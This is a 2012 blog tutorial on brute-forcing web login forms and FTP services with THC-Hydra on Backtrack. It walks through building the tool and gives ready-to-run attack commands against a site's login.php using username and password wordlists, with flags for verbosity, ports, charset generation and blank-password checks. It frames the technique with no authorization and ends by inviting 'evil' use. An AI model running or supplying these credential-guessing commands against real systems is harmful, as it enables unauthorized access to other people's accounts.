Thursday, November 22, 2012

How to brute-force web-based authentication systems with THC-Hydra

Tutorial provided by

Brief Introduction

Hey guys. I decided to make one. We gonna use the UNIX distribution of THC-Hydra and I'll go through some of its main features and different attack methods.

I. How to install

First you’ll need Backtrack, of course. You can either run it in virtualization on a virtual machine like VMware or Virtualbox. I will not cover how to boot Backtrack, there have already been lots of tutorials on the net.

Now I suppose most of you know how to run it but nevertheless I included a guide for the installation process under Backtrack 5R2 (or any unix based system as a whole).

Open up a terminal and type:

Code:
wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz



Once downloaded going to extract it
Code:
tar -xvf hydra-6.3-src.tar.gz




Now configuring and installing


Code:
./configure && make && install





Code:
make install




II. How to use

Note:  If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)

Now in order to brute-force a specific login form you need to define the username (if you don't know it include a file containing some), the wordlists directory, the service attacking and form method and the page itself.

Specifying those parameters the attack would look like:


Code:
./hydra -l admin -P /root/Words.txt site.com http-post-form "/login.php&username=^USER^&password=^PASS^"



The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login).

The -p switch defines the password  and  the capital -P - the directory for the wordlists ( the -P is used almost always)

If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp".



Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the code.


They could be usr, pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just view the source and make sure what their names are.

Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in the MAN page of hydra

-vV - The verbose mode. This mode shows you every login attempt hydra tries.
-s - We specify the port on which we're running our attack.
-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.
-R - Restores a previously aborted session of an attack.
-e ns - Checks for blank or no password fields.

So an example of an advanced attack would look like:


Code:
./hydra -L /root/usernames.txt -P /root/HugeDB.txt -e ns -vV -s 80 site.com http-post-form "/login.php&username=^USER^&password=^PASS^



I hope this tutorial will be implemented for good (OK - evil :D) purposes.
Thanks for reading!